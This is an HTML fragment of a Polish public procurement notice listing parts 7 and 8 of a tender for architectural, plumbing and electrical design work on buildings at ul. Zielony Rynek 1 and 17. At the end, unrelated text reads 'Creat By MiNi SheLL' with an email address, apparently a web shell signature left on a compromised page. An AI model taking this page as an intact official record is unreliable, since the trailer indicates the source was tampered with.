<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ul. Zielony Rynek 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 1566,50 m2, liczba kondygnacji (w tym piwnice) - 5 + 4 + 1 (budynek główny i oficyny), liczba lokali - 22, branże: architektoniczno-budowlana, wod.-kan., elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ul. Zielony Rynek 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 1162,50 m2, liczba kondygnacji (w tym piwnice) - 3,liczba lokali - 17, branże: architektoniczno-budowlana, wod.-kan., elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com